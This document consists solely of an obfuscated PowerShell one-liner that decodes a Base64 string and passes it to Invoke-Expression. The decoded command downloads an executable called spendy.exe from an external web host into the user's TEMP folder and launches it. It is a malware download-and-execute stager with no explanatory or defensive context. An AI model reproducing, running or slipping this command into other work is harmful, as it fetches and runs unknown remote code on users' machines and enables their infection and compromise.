iex([sySTEm.tExt.encoDiNg]::UTF8.GeTStRing([SYSTem.cOnVerT]::fromBaSe64STRINg('CihOZXctT2JqZWN0IHNZc3RlTS5ORXQud2ViQ0xpZW5UKS5kT3dObE9hZEZpTEUoJ2h0dHA6Ly9sYWJpZC5jb20ubXkvc3BlL3NwZW5keS5leGUnLCIkRW52OlRFTVBcc3BlbmR5LmV4ZSIpO1N0YXJ0LVByb2Nlc3MgKCIkRW52OlRFTVBcc3BlbmR5LmV4ZSIpCgo=')));exit

